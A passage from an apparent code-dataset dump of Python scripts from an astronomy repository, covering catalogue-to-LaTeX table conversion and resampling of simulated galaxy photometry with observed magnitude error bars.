r\"$\\zeta^\\mathrm{meds,WX}_{q,45'',i<23}$\", ha='center', va='center', size='20')\nif ((radius == \"120\") & (mag == \"23\") & (mode == \"meds\")):\n fig.text(0.5, 0.05, r\"$\\zeta^\\mathrm{meds,WX}_{q,120'',i<23}$\", ha='center', va='center', size='20')\nif ((radius == \"120\") & (mag == \"24\") & (mode == \"sum\")):\n fig.text(0.5, 0.05, r\"$\\zeta^\\mathrm{sum,WX}_{q,120'',i<24}$\", ha='center', va='center', size='20')\n#fig.text(0.05, 0.5, 'normalized counts', ha='center', va='center', size='20', rotation='vertical')\nplt.savefig('%s%s_weightedcountshist_%sarcsec_%sinner_%s_%s_%s_%s_%s%s_zgap%s_%s_notext.png' % (root, lens, radius, inner, mag, mode, photz, detect, irac, handpicked, zinf, zsup), dpi=500)\n\nprint(\" --- %s seconds ---\" % (time.time() - start_time))\n\nprint 'Done!'\n" }, { "alpha_fraction": 0.4580594301223755, "alphanum_fraction": 0.5569287538528442, "avg_line_length": 29.669355392456055, "blob_id": "36abe022828771a8340a6564901faee96c4d082e", "content_id": "7984b925dc36f4b3a5011cd86c3ae12203485765", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3803, "license_type": "no_license", "max_line_length": 684, "num_lines": 124, "path": "/python/catalogue_utilities/tabletotex_Sluse18phot copy.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# Takes a table and returns a custom latex version content\nimport numpy as np\nimport os\nfrom os import system\nfrom astropy import units as u\nfrom astropy.coordinates import SkyCoord\n\n################## read catalogue\nfilein = '/Users/cerusu/Dropbox/Davis_work/code/WFI2033/IRAC_noeasytemplateerrors_irmatched.cat'\nra = 2\ndec = 3\nitot = 4\nitot_err = 5\nu = 9\nu_err = 10\ng = 11\ng_err = 12\nr = 13\nr_err = 14\ni = 15\ni_err = 16\nz = 17\nz_err = 18\nY = 19\nY_err = 20\nJ = 21\nJ_err = 22\nH = 23\nH_err = 24\nK = 25\nK_err = 26\nch1 = 74\nch1_err = 102\nch2 = 76\nch2_err = 104\nch3 = 78\nch3_err = 106\nch4 = 80\nch4_err = 108\nclass_eazy = 98\ndata = np.loadtxt(filein,usecols=[ra,dec,itot,itot_err,u,u_err,g,g_err,r,r_err,i,i_err,z,z_err,Y,Y_err,J,J_err,H,H_err,K,K_err,ch1,ch1_err,ch2,ch2_err,ch3,ch3_err,ch4,ch4_err,class_eazy],unpack=False)\nprint np.shape(data)\nra = 0\ndec = 1\nitot = 2\nitot_err = 3\nu = 4\nu_err = 5\ng = 6\ng_err = 7\nr = 8\nr_err = 9\ni = 10\ni_err = 11\nz = 12\nz_err = 13\nY = 14\nY_err = 15\nJ = 16\nJ_err = 17\nH = 18\nH_err = 19\nK = 20\nK_err = 21\nch1 = 22\nch1_err = 23\nch2 = 24\nch2_err = 25\nch3 = 26\nch3_err = 27\nch4 = 28\nch4_err = 29\nclass_eazy = 30\nlens = SkyCoord(308.4253, -47.39528, unit='deg')\nx = SkyCoord(243.079849, 53.012886, unit='deg')\nx = SkyCoord(data[:,ra], data[:,dec], unit='deg')\nsep = x.separation(lens).arcsec\ndata = np.c_[data,sep]\nsep = 31\n\n################## impose conditions\ndata = data[data[:,itot] <= 23]\ndata = data[data[:,class_eazy] >= 0]\ndata = data[data[:,sep] <= 120]\nu_corr = +1.40\ng_corr = -0.03\nr_corr = -0.00\ni_corr = 0.00\nz_corr = -0.01\nY_corr = -0.07\nJ_corr = -0.10\nH_corr = -0.01\nK_corr = +0.06\n# conversion from Vega to AB; assuming that the input mags are in Vega\nJ_corr += 0.94\nH_corr += 1.35\nK_corr += 1.83\ndata[:,u][data[:,u] < 99] = data[:,u][data[:,u] < 99] + u_corr\ndata[:,u_err][data[:,u] == 99] = 99\ndata[:,g][data[:,g] < 99] = data[:,g][data[:,g] < 99] + g_corr\ndata[:,g_err][data[:,g] == 99] = 99\ndata[:,r][data[:,r] < 99] = data[:,r][data[:,r] < 99] + r_corr\ndata[:,r_err][data[:,r] == 99] = 99\ndata[:,z][data[:,z] < 99] = data[:,z][data[:,z] < 99] + z_corr\ndata[:,z_err][data[:,z] == 99] = 99\ndata[:,Y][data[:,Y] < 99] = data[:,Y][data[:,Y] < 99] + Y_corr\ndata[:,Y_err][data[:,Y] == 99] = 99\ndata[:,J][data[:,J] < 99] = data[:,J][data[:,J] < 99] + J_corr\ndata[:,J_err][data[:,J] == 99] = 99\ndata[:,H][data[:,H] < 99] = data[:,H][data[:,H] < 99] + H_corr\ndata[:,H_err][data[:,H] == 99] = 99\ndata[:,K][data[:,K] < 99] = data[:,K][data[:,K] < 99] + K_corr\ndata[:,K_err][data[:,K] == 99] = 99\nprint np.shape(data)\nfileout = '/Users/cerusu/GITHUB/H0LiCOW/papers/WFI2033Environment/table_phot.tex'\nnp.savetxt(fileout,np.c_[data[:,ra],data[:,dec],data[:,itot],data[:,itot_err],data[:,u],data[:,u_err],data[:,g],data[:,g_err],data[:,r],data[:,r_err],data[:,i],data[:,i_err],data[:,z],data[:,z_err],data[:,Y],data[:,Y_err],data[:,J],data[:,J_err],data[:,H],data[:,H_err],data[:,K],data[:,K_err],data[:,ch1],data[:,ch1_err],data[:,ch2],data[:,ch2_err],data[:,ch3],data[:,ch3_err],data[:,ch4],data[:,ch4_err]],fmt='%.5f & $%.5f$ & $%.2f \\pm %.2f$ & $%.2f \\pm %.2f$ & $%.2f \\pm %.2f$ & $%.2f \\pm %.2f$ & $%.2f \\pm %.2f$ & $%.2f \\pm %.2f$ & $%.2f \\pm %.2f$ & $%.2f \\pm %.2f$ & $%.2f \\pm %.2f$ & $%.2f \\pm %.2f$ & $%.2f \\pm %.2f$ & $%.2f \\pm %.2f$ & $%.2f \\pm %.2f$ & $%.2f \\pm %.2f$ \\\\\\\\')\nstrin = '-99.00 \\\\\\pm -99.00'\nstrout = '-'\nos.system(\"sed -i -e \\'s/%s/%s/g\\' %s\" % (strin,strout,fileout))\nstrin = '99.00 \\\\\\pm 99.00'\nstrout = '-'\nos.system(\"sed -i -e \\'s/%s/%s/g\\' %s\" % (strin,strout,fileout))\n\n#np.savetxt(masterfile[:-4] + \"_WFI2033noIRACeazy_nobeta_testduplicate.cat\",data.T,fmt='%s %s %s %s %.2f %.2f %d %d %.2f %.4f %.4f %.2f %.4f %.4f %.2f %.4f %.4f %.2f %.4f %.4f %.2f %.4f %.4f %.2f %.4f %.4f %.2f %.4f %.4f %.2f %.4f %.4f %.2f %.4f %.4f %.2f %.4f %.4f')\n" }, { "alpha_fraction": 0.47536739706993103, "alphanum_fraction": 0.5862084627151489, "avg_line_length": 87.51195526123047, "blob_id": "c115a1666063f797bdab128a27ba346df8a36610", "content_id": "cf59418890147de8c162e459a40f8628e0506a15", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 44433, "license_type": "no_license", "max_line_length": 441, "num_lines": 502, "path": "/python/catalogue_utilities/extractMillennium_SA.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# This code samples from the Millenium Simulation (MS) photometry, assuming observed CFHTLenS-like or observed lens-like uncertainties. The files it creates will be used by photozMillenium.py\n# run as: python extractMillenium.py GGL_los_8_0_0_0_0_N_4096_ang_4_SA_galaxies_on_plane_27_to_63.images.txt\n\nimport numpy as np\nimport sys\n\nlens = \"0408\"\nilim = 22.5\nfilters = \"griz\"\nrootin = \"/Volumes/LaCieDavis/lensing_simulations/SA_galaxies/original/original/\"\nrootout = \"/Volumes/LaCieDavis/lensing_simulations/SA_galaxies/original/%s/\" % lens\nfilein = str(sys.argv[1])\n#fileout_ugriz = rootout+filein[:-11] + \"_ugriz.images.txt\"\n#fileout_ugrizJHK = rootout+filein[:-11] + \"_%s_%s.images.txt\" % (filters,lens)\nfileout = rootout + filein[:-11] + \"_%s_%s.images.txt\" % (filters,lens)\n\nid = 0\nzspec = 5\nposx = 6\nposy = 7\n#mhalo = 9\n#mstar = 11\n#u = 12\ng = 13\nr = 14\ni = 15\nz = 16\n#J = 17\n#H = 18\n#K = 19\n\n#data = np.loadtxt(rootin+filein,usecols=[id,zspec,posx,posy,mhalo,mstar,u,g,r,i,z,K],comments='GalID',unpack=True)\ndata = np.loadtxt(rootin+filein,usecols=[id,zspec,posx,posy,g,r,i,z],comments='GalID',unpack=True)\n\n# reposition labels\n#id = 0\n#zspec = 1\n#posx = 2\n#posy = 3\n#mhalo = 4\n#mstar = 5\n#u = 6\n#g = 7\n#r = 8\n#i = 9\n#z = 10\n#K = 11\n\nid = 0\nzspec = 1\nposx = 2\nposy = 3\ng = 4\nr = 5\ni = 6\nz = 7\n\ndef positive(x):\n x[x<0.01] = 0.01\n return x\n\n#dataout = np.zeros([np.shape(data)[0]+9,np.shape(data)[1]]) # use this instead of dataout since I am modifying the content but I will still need the original content when working with multiple sets of filters\ndataout = np.zeros([np.shape(data)[0]+4,np.shape(data)[1]])\n\n\n# name dataout labels\n# o stands for out\n#id_o = 0\n#zspec_o = 1\n#posx_o = 2\n#posy_o = 3\n#mhalo_o = 4\n#mstar_o = 5\n#iorig_o = 6\n#u_o = 7\n#uerr_o = 8\n#g_o = 9\n#gerr_o = 10\n#r_o = 11\n#rerr_o = 12\n#i_o = 13\n#ierr_o = 14\n#z_o = 15\n#zerr_o = 16\n#K_o = 17\n#Kerr_o = 18\n\nid_o = 0\nzspec_o = 1\nposx_o = 2\nposy_o = 3\ng_o = 4\ngerr_o = 5\nr_o = 6\nrerr_o = 7\ni_o = 8\nierr_o = 9\nz_o = 10\nzerr_o = 11\n\ndataout[id_o] = np.copy(data[id])\ndataout[zspec_o] = np.copy(data[zspec])\ndataout[posx_o] = np.copy(data[posx])\ndataout[posy_o] = np.copy(data[posy])\n#dataout[mhalo_o] = np.copy(data[mhalo])\n#dataout[mstar_o] = np.copy(data[mstar])\n#dataout[iorig_o] = np.copy(data[i])\n#dataout[u_o] = np.copy(data[u])\ndataout[g_o] = np.copy(data[g])\ndataout[r_o] = np.copy(data[r])\ndataout[i_o] = np.copy(data[i])\ndataout[z_o] = np.copy(data[z])\n#dataout[K_o] = np.copy(data[K])\n\n''' Sampling the photometry by assuming error bars from the observations. First assign the non-fixed error bar, then sample a new photometry point'''\nif lens == \"0408\":\n# griz (DES-like)\n file_errorbars = \"/Users/cerusu/Dropbox/Davis_work/code/0408/median_errors_hlin_12Aug2019edited.txt\"\n err = np.loadtxt(file_errorbars,unpack=True)\n err_maginf = 0\n err_magsup = 1\n err_g_lnmed = 2\n err_g_lnsig = 3\n err_r_lnmed = 5\n err_r_lnsig = 6\n err_i_lnmed = 8\n err_i_lnsig = 9\n err_z_lnmed = 11\n err_z_lnsig = 12\n\n dataout[gerr_o][dataout[g_o] < err[err_maginf][0]] = 2.718 ** np.random.normal(err[err_g_lnmed][0], err[err_g_lnsig][0], len(dataout[gerr_o][dataout[g_o] < err[err_maginf][0]]))\n for j in range(len(err[0])):\n dataout[gerr_o][(dataout[g_o] >= err[err_maginf][j]) & (dataout[g_o] < err[err_magsup][j])] = 2.718 ** np.random.normal(err[err_g_lnmed][j], err[err_g_lnsig][j], len(dataout[gerr_o][(dataout[g_o] >= err[err_maginf][j]) & (dataout[g_o] < err[err_magsup][j])]))\n dataout[gerr_o][dataout[g_o] >= err[err_magsup][-1]] = 2.718 ** np.random.normal(err[err_g_lnmed][-1], err[err_g_lnsig][-1], len(dataout[gerr_o][dataout[g_o] >= err[err_magsup][-1]]))\n\n dataout[rerr_o][dataout[r_o] < err[err_maginf][0]] = 2.718 ** np.random.normal(err[err_r_lnmed][0], err[err_r_lnsig][0], len(dataout[rerr_o][dataout[r_o] < err[err_maginf][0]]))\n for j in range(len(err[0])):\n dataout[rerr_o][(dataout[r_o] >= err[err_maginf][j]) & (dataout[r_o] < err[err_magsup][j])] = 2.718 ** np.random.normal(err[err_r_lnmed][j], err[err_r_lnsig][j], len(dataout[rerr_o][(dataout[r_o] >= err[err_maginf][j]) & (dataout[r_o] < err[err_magsup][j])]))\n dataout[rerr_o][dataout[r_o] >= err[err_magsup][-1]] = 2.718 ** np.random.normal(err[err_r_lnmed][-1], err[err_r_lnsig][-1], len(dataout[rerr_o][dataout[r_o] >= err[err_magsup][-1]]))\n\n dataout[ierr_o][dataout[i_o] < err[err_maginf][0]] = 2.718 ** np.random.normal(err[err_i_lnmed][0], err[err_i_lnsig][0], len(dataout[ierr_o][dataout[i_o] < err[err_maginf][0]]))\n for j in range(len(err[0])):\n dataout[ierr_o][(dataout[i_o] >= err[err_maginf][j]) & (dataout[i_o] < err[err_magsup][j])] = 2.718 ** np.random.normal(err[err_i_lnmed][j], err[err_i_lnsig][j], len(dataout[ierr_o][(dataout[i_o] >= err[err_maginf][j]) & (dataout[i_o] < err[err_magsup][j])]))\n dataout[ierr_o][dataout[i_o] >= err[err_magsup][-1]] = 2.718 ** np.random.normal(err[err_i_lnmed][-1], err[err_i_lnsig][-1], len(dataout[ierr_o][dataout[i_o] >= err[err_magsup][-1]]))\n\n dataout[zerr_o][dataout[z_o] < err[err_maginf][0]] = 2.718 ** np.random.normal(err[err_z_lnmed][0], err[err_z_lnsig][0], len(dataout[zerr_o][dataout[z_o] < err[err_maginf][0]]))\n for j in range(len(err[0])):\n dataout[zerr_o][(dataout[z_o] >= err[err_maginf][j]) & (dataout[z_o] < err[err_magsup][j])] = 2.718 ** np.random.normal(err[err_z_lnmed][j], err[err_z_lnsig][j], len(dataout[zerr_o][(dataout[z_o] >= err[err_maginf][j]) & (dataout[z_o] < err[err_magsup][j])]))\n dataout[zerr_o][dataout[z_o] >= err[err_magsup][-1]] = 2.718 ** np.random.normal(err[err_z_lnmed][-1], err[err_z_lnsig][-1], len(dataout[zerr_o][dataout[z_o] >= err[err_magsup][-1]]))\n\n# ugriz (CFHTLenS-like)\n#dataout[uerr_o][data[u]<23] = positive(np.random.normal(0.0076, 0.0021, len(data[u][data[u]<23])))\n#dataout[uerr_o][(data[u]>=23) & (data[u]<24)] = positive(np.random.normal(0.0136, 0.0046, len(data[u][(data[u]>=23) & (data[u]<24)])))\n#dataout[uerr_o][(data[u]>=24) & (data[u]<24.5)] = positive(np.random.normal(0.0212, 0.0072, len(data[u][(data[u]>=24) & (data[u]<24.5)])))\n#dataout[uerr_o][(data[u]>=24.5) & (data[u]<25)] = positive(np.random.normal(0.0308, 0.0113, len(data[u][(data[u]>=24.5) & (data[u]<25)])))\n#dataout[uerr_o][(data[u]>=25) & (data[u]<25.5)] = positive(np.random.normal(0.0451, 0.0166, len(data[u][(data[u]>=25) & (data[u]<25.5)])))\n#dataout[uerr_o][(data[u]>=25.5) & (data[u]<26)] = positive(np.random.normal(0.0689, 0.0230, len(data[u][(data[u]>=25.5) & (data[u]<26)])))\n#dataout[uerr_o][(data[u]>=26) & (data[u]<26.5)] = positive(np.random.normal(0.1054, 0.0308, len(data[u][(data[u]>=26) & (data[u]<26.5)])))\n#dataout[uerr_o][(data[u]>=26.5) & (data[u]<26.75)] = positive(np.random.normal(0.1430, 0.0357, len(data[u][(data[u]>=26.5) & (data[u]<26.75)])))\n#dataout[uerr_o][(data[u]>=26.75) & (data[u]<27)] = positive(np.random.normal(0.1735, 0.0413, len(data[u][(data[u]>=26.75) & (data[u]<27)])))\n#dataout[uerr_o][(data[u]>=27) & (data[u]<27.25)] = positive(np.random.normal(0.2100, 0.0498, len(data[u][(data[u]>=27) & (data[u]<27.25)])))\n#dataout[uerr_o][(data[u]>=27.25) & (data[u]<27.5)] = positive(np.random.normal(0.2576, 0.0584, len(data[u][(data[u]>=27.25) & (data[u]<27.5)])))\n#dataout[uerr_o][(data[u]>=27.5) & (data[u]<27.75)] = positive(np.random.normal(0.3070, 0.0661, len(data[u][(data[u]>=27.5) & (data[u]<27.75)])))\n#dataout[uerr_o][data[u]>=27.75] = positive(np.random.normal(0.4078, 0.0959, len(data[u][data[u]>=27.75])))\n\n#dataout[gerr_o][data[g]<24] = positive(np.random.normal(0.0098, 0.0038, len(data[g][data[g]<24])))\n#dataout[gerr_o][(data[g]>=24) & (data[g]<24.5)] = positive(np.random.normal(0.0156, 0.0062, len(data[g][(data[g]>=24) & (data[g]<24.5)])))\n#dataout[gerr_o][(data[g]>=24.5) & (data[g]<25)] = positive(np.random.normal(0.0227, 0.0100, len(data[g][(data[g]>=24.5) & (data[g]<25)])))\n#dataout[gerr_o][(data[g]>=25) & (data[g]<25.5)] = positive(np.random.normal(0.0339, 0.0141, len(data[g][(data[g]>=25) & (data[g]<25.5)])))\n#dataout[gerr_o][(data[g]>=25.5) & (data[g]<26)] = positive(np.random.normal(0.0514, 0.0213, len(data[g][(data[g]>=25.5) & (data[g]<26)])))\n#dataout[gerr_o][(data[g]>=26) & (data[g]<26.5)] = positive(np.random.normal(0.0778, 0.0237, len(data[g][(data[g]>=26) & (data[g]<26.5)])))\n#dataout[gerr_o][(data[g]>=26.5) & (data[g]<26.75)] = positive(np.random.normal(0.1080, 0.0300, len(data[g][(data[g]>=26.5) & (data[g]<26.75)])))\n#dataout[gerr_o][(data[g]>=26.75) & (data[g]<27)] = positive(np.random.normal(0.1329, 0.0308, len(data[g][(data[g]>=26.75) & (data[g]<27)])))\n#dataout[gerr_o][(data[g]>=27) & (data[g]<27.25)] = positive(np.random.normal(0.1548, 0.0410, len(data[g][(data[g]>=27) & (data[g]<27.25)])))\n#dataout[gerr_o][(data[g]>=27.25) & (data[g]<27.5)] = positive(np.random.normal(0.1881, 0.0327, len(data[g][(data[g]>=27.25) & (data[g]<27.5)])))\n#dataout[gerr_o][(data[g]>=27.5) & (data[g]<27.75)] = positive(np.random.normal(0.2331, 0.0229, len(data[g][(data[g]>=27.5) & (data[g]<27.75)])))\n#dataout[gerr_o][data[g]>=27.75] = positive(np.random.normal(0.2817, 0.1344, len(data[g][data[g]>=27.75])))\n\n#dataout[rerr_o][data[r]<23] = positive(np.random.normal(0.0064, 0.0022, len(data[r][data[r]<23])))\n#dataout[rerr_o][(data[r]>=23) & (data[r]<24)] = positive(np.random.normal(0.0126, 0.0055, len(data[r][(data[r]>=23) & (data[r]<24)])))\n#dataout[rerr_o][(data[r]>=24) & (data[r]<24.5)] = positive(np.random.normal(0.0203, 0.0084, len(data[r][(data[r]>=24) & (data[r]<24.5)])))\n#dataout[rerr_o][(data[r]>=24.5) & (data[r]<25)] = positive(np.random.normal(0.0293, 0.0147, len(data[r][(data[r]>=24.5) & (data[r]<25)])))\n#dataout[rerr_o][(data[r]>=25) & (data[r]<25.5)] = positive(np.random.normal(0.0419, 0.0147, len(data[r][(data[r]>=25) & (data[r]<25.5)])))\n#dataout[rerr_o][(data[r]>=25.5) & (data[r]<26)] = positive(np.random.normal(0.0647, 0.0255, len(data[r][(data[r]>=25.5) & (data[r]<26)])))\n#dataout[rerr_o][(data[r]>=26) & (data[r]<26.5)] = positive(np.random.normal(0.0834, 0.0196, len(data[r][(data[r]>=26) & (data[r]<26.5)])))\n#dataout[rerr_o][(data[r]>=26.5) & (data[r]<26.75)] = positive(np.random.normal(0.1261, 0.0277, len(data[r][(data[r]>=26.5) & (data[r]<26.75)])))\n#dataout[rerr_o][(data[r]>=26.75) & (data[r]<27)] = positive(np.random.normal(0.1403, 0.0134, len(data[r][(data[r]>=26.75) & (data[r]<27)])))\n#dataout[rerr_o][data[r]>=27] = positive(np.random.normal(0.1943, 0.0152, len(data[r][data[r]>=27])))\n\n#dataout[ierr_o][data[i]<23] = positive(np.random.normal(0.0049, 0.0030, len(data[i][data[i]<23])))\n#dataout[ierr_o][(data[i]>=23) & (data[i]<23.5)] = positive(np.random.normal(0.0115, 0.0051, len(data[i][(data[i]>=23) & (data[i]<23.5)])))\n#dataout[ierr_o][(data[i]>=23.5) & (data[i]<23.75)] = positive(np.random.normal(0.0155, 0.0066, len(data[i][(data[i]>=23.5) & (data[i]<23.75)])))\n#dataout[ierr_o][data[i]>=23.75] = positive(np.random.normal(0.0193, 0.0078, len(data[i][data[i]>=23.75])))\n\n#dataout[zerr_o][data[z]<21] = positive(np.random.normal(0.0056, 0.0026, len(data[z][data[z]<21])))\n#dataout[zerr_o][(data[z]>=21) & (data[z]<21.5)] = positive(np.random.normal(0.0102, 0.0032, len(data[z][(data[z]>=21) & (data[z]<21.5)])))\n#dataout[zerr_o][(data[z]>=21.5) & (data[z]<22)] = positive(np.random.normal(0.0146, 0.0043, len(data[z][(data[z]>=21.5) & (data[z]<22)])))\n#dataout[zerr_o][(data[z]>=22) & (data[z]<22.5)] = positive(np.random.normal(0.0212, 0.0084, len(data[z][(data[z]>=22) & (data[z]<22.5)])))\n#dataout[zerr_o][(data[z]>=22.5) & (data[z]<23)] = positive(np.random.normal(0.0315, 0.0126, len(data[z][(data[z]>=22.5) & (data[z]<23)])))\n#dataout[zerr_o][(data[z]>=23) & (data[z]<23.5)] = positive(np.random.normal(0.0480, 0.0182, len(data[z][(data[z]>=23) & (data[z]<23.5)])))\n#dataout[zerr_o][(data[z]>=23.5) & (data[z]<24)] = positive(np.random.normal(0.0721, 0.0244, len(data[z][(data[z]>=23.5) & (data[z]<24)])))\n#dataout[zerr_o][(data[z]>=24) & (data[z]<24.25)] = positive(np.random.normal(0.1099, 0.0304, len(data[z][(data[z]>=24) & (data[z]<24.25)])))\n#dataout[zerr_o][(data[z]>=24.25) & (data[z]<24.5)] = positive(np.random.normal(0.1412, 0.0359, len(data[z][(data[z]>=24.25) & (data[z]<24.5)])))\n#dataout[zerr_o][(data[z]>=24.5) & (data[z]<24.75)] = positive(np.random.normal(0.1714, 0.0367, len(data[z][(data[z]>=24.5) & (data[z]<24.75)])))\n#dataout[zerr_o][(data[z]>=24.75) & (data[z]<25)] = positive(np.random.normal(0.2162, 0.0354, len(data[z][(data[z]>=24.75) & (data[z]<25)])))\n#dataout[zerr_o][data[z]>=25] = positive(np.random.normal(0.2525, 0.0346, len(data[z][data[z]>=25])))\n\n#dataout[u_o] = np.random.normal(dataout[u_o], dataout[uerr_o])\ndataout[g_o] = np.random.normal(dataout[g_o], dataout[gerr_o])\ndataout[r_o] = np.random.normal(dataout[r_o], dataout[rerr_o])\ndataout[i_o] = np.random.normal(dataout[i_o], dataout[ierr_o])\ndataout[z_o] = np.random.normal(dataout[z_o], dataout[zerr_o])\n\ndataout[gerr_o][dataout[gerr_o] <= 0.01] = 0.01\ndataout[rerr_o][dataout[rerr_o] <= 0.01] = 0.01\ndataout[ierr_o][dataout[ierr_o] <= 0.01] = 0.01\ndataout[zerr_o][dataout[zerr_o] <= 0.01] = 0.01\n\n# eliminate objects that are i> 24 in both the original iorig and the randomized i\n#dataout = np.delete(dataout,np.where((dataout[i_o] > 24) & (dataout[iorig_o] > 24)),axis=1)\ndataout = np.delete(dataout,np.where(dataout[i_o] > ilim),axis=1)\n\n# applying 1-sigma detection limits from Erben et al. 2013, including its uncertainty\n#dataout[u_o][dataout[u_o]>=np.random.normal(25.24+1.75, 0.17, len(dataout[u_o]))] = 99.0\n#dataout[g_o][dataout[g_o]>=np.random.normal(25.58+1.75, 0.15, len(dataout[g_o]))] = 99.0\n#dataout[r_o][dataout[r_o]>=np.random.normal(24.88+1.75, 0.16, len(dataout[r_o]))] = 99.0\n#dataout[z_o][dataout[z_o]>=np.random.normal(23.46+1.75, 0.20, len(dataout[z_o]))] = 99.0\n#dataout[uerr_o][dataout[u_o]==99.0] = 25.24+1.75\n#dataout[gerr_o][dataout[g_o]==99.0] = 25.58+1.75\n#dataout[rerr_o][dataout[r_o]==99.0] = 24.88+1.75\n#dataout[zerr_o][dataout[z_o]==99.0] = 23.46+1.75\n\n#head = \"GalID \\t z_spec \\t pos_0[rad] \\t pos_1[rad] \\t M_Halo[M_sol/h] \\t M_Stellar[M_sol/h] \\t mag_SDSS_iorig \\t mag_SDSS_u \\t mag_SDSS_uerr \\t mag_SDSS_g \\t mag_SDSS_gerr \\t mag_SDSS_r \\t mag_SDSS_rerr \\t mag_SDSS_i \\t mag_SDSS_ierr \\t mag_SDSS_z \\t mag_SDSS_zerr\" NOT USING THIS ONE BECAUSE THE SPECIAL CHARACTERS ARE NOT RECOGNIZED PROPERLY BY BPZ\n#head = \"GalID \\t z_spec \\t pos0 \\t pos1 \\t M_Halo \\t M_Stellar \\t mag_SDSS_iorig \\t mag_SDSS_u \\t mag_SDSS_uerr \\t mag_SDSS_g \\t mag_SDSS_gerr \\t mag_SDSS_r \\t mag_SDSS_rerr \\t mag_SDSS_i \\t mag_SDSS_ierr \\t mag_SDSS_z \\t mag_SDSS_zerr\"\nif lens == \"0408\": head = \"GalID \\t z_spec \\t pos0 \\t pos1 \\t mag_SDSS_g \\t mag_SDSS_gerr \\t mag_SDSS_r \\t mag_SDSS_rerr \\t mag_SDSS_i \\t mag_SDSS_ierr \\t mag_SDSS_z \\t mag_SDSS_zerr\"\n#np.savetxt(fileout_ugriz,np.c_[dataout[id_o],dataout[zspec_o],dataout[posx_o],dataout[posy_o],dataout[mhalo_o],dataout[mstar_o],dataout[iorig_o],dataout[u_o],dataout[uerr_o],dataout[g_o],dataout[gerr_o],dataout[r_o],dataout[rerr_o],dataout[i_o],dataout[ierr_o],dataout[z_o],dataout[zerr_o]],header=head,fmt='%d \\t %.3f \\t %.7f \\t %.7f \\t %.3e \\t %.3e \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f')\nif lens == \"0408\": np.savetxt(fileout,np.c_[dataout[id_o],dataout[zspec_o],dataout[posx_o],dataout[posy_o],dataout[g_o],dataout[gerr_o],dataout[r_o],dataout[rerr_o],dataout[i_o],dataout[ierr_o],dataout[z_o],dataout[zerr_o]],header=head,fmt='%d \\t %.3f \\t %.7f \\t %.7f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f \\t %.2f')\n\n#dataout = np.zeros([15,np.shape(data)[1]])\n\n# name dataout labels\n# o stands for out\n#id_o = 0\n#zspec_o = 1\n#posx_o = 2\n#posy_o = 3\n#mhalo_o = 4\n#mstar_o = 5\n#iorig_o = 6\n#g_o = 7\n#gerr_o = 8\n#r_o = 9\n#rerr_o = 10\n#i_o = 11\n#ierr_o = 12\n#K_o = 13\n#Kerr_o = 14\n\n#dataout[id_o] = np.copy(data[id])\n#dataout[zspec_o] = np.copy(data[zspec])\n#dataout[posx_o] = np.copy(data[posx])\n#dataout[posy_o] = np.copy(data[posy])\n#dataout[mhalo_o] = np.copy(data[mhalo])\n#dataout[mstar_o] = np.copy(data[mstar])\n#dataout[iorig_o] = np.copy(data[i])\n#dataout[g_o] = np.copy(data[g])\n#dataout[r_o] = np.copy(data[r])\n#dataout[i_o] = np.copy(data[i])\n#dataout[K_o] = np.copy(data[K])\n\n''' Sampling the photometry by assuming error bars from the observations. '''\n# ugriJHK\n# WFI2033\n#dataout[uerr_o][data[u]<20] = positive(np.random.normal(0.01, 0.006, len(data[u][data[u]<20])))\n#dataout[uerr_o][(data[u]>=20) & (data[u]<20.5)] = positive(np.random.normal(0.02, 0.009, len(data[u][(data[u]>=20) & (data[u]<20.5)])))\n#dataout[uerr_o][(data[u]>=20.5) & (data[u]<21)] = positive(np.random.normal(0.03, 0.008, len(data[u][(data[u]>=20.5) & (data[u]<21)])))\n#dataout[uerr_o][(data[u]>=21) & (data[u]<21.5)] = positive(np.random.normal(0.04, 0.013, len(data[u][(data[u]>=21) & (data[u]<21.5)])))\n#dataout[uerr_o][(data[u]>=21.5) & (data[u]<22)] = positive(np.random.normal(0.06, 0.015, len(data[u][(data[u]>=21.5) & (data[u]<22)])))\n#dataout[uerr_o][(data[u]>=22) & (data[u]<22.5)] = positive(np.random.normal(0.07, 0.016, len(data[u][(data[u]>=22) & (data[u]<22.5)])))\n#dataout[uerr_o][(data[u]>=22.5) & (data[u]<22.75)] = positive(np.random.normal(0.09, 0.014, len(data[u][(data[u]>=22.5) & (data[u]<22.75)])))\n#dataout[uerr_o][(data[u]>=22.75) & (data[u]<23)] = positive(np.random.normal(0.11, 0.022, len(data[u][(data[u]>=22.75) & (data[u]<23)])))\n#dataout[uerr_o][(data[u]>=23) & (data[u]<23.25)] = positive(np.random.normal(0.12, 0.013, len(data[u][(data[u]>=23) & (data[u]<23.25)])))\n#dataout[uerr_o][(data[u]>=23.25) & (data[u]<23.5)] = positive(np.random.normal(0.14, 0.018, len(data[u][(data[u]>=23.25) & (data[u]<23.5)])))\n#dataout[uerr_o][(data[u]>=23.5) & (data[u]<23.75)] = positive(np.random.normal(0.16, 0.034, len(data[u][(data[u]>=23.5) & (data[u]<23.75)])))\n#dataout[uerr_o][(data[u]>=23.75) & (data[u]<24)] = positive(np.random.normal(0.17, 0.029, len(data[u][(data[u]>=23.75) & (data[u]<24)])))\n#dataout[uerr_o][(data[u]>=24) & (data[u]<24.25)] = positive(np.random.normal(0.17, 0.017, len(data[u][(data[u]>=24) & (data[u]<24.25)])))\n#dataout[uerr_o][(data[u]>=24.25) & (data[u]<24.5)] = positive(np.random.normal(0.19, 0.026, len(data[u][(data[u]>=24.25) & (data[u]<24.5)])))\n#dataout[uerr_o][(data[u]>=24.5) & (data[u]<24.75)] = positive(np.random.normal(0.20, 0.046, len(data[u][(data[u]>=24.5) & (data[u]<24.75)])))\n#dataout[uerr_o][(data[u]>=24.75) & (data[u]<25)] = positive(np.random.normal(0.26, 0.038, len(data[u][(data[u]>=24.75) & (data[u]<25)])))\n#dataout[uerr_o][(data[u]>=25) & (data[u]<25.25)] = positive(np.random.normal(0.32, 0.032, len(data[u][(data[u]>=25) & (data[u]<25.25)])))\n#dataout[uerr_o][data[u]>=25.25] = positive(np.random.normal(0.36, 0.039, len(data[u][data[u]>=25.25])))\n# 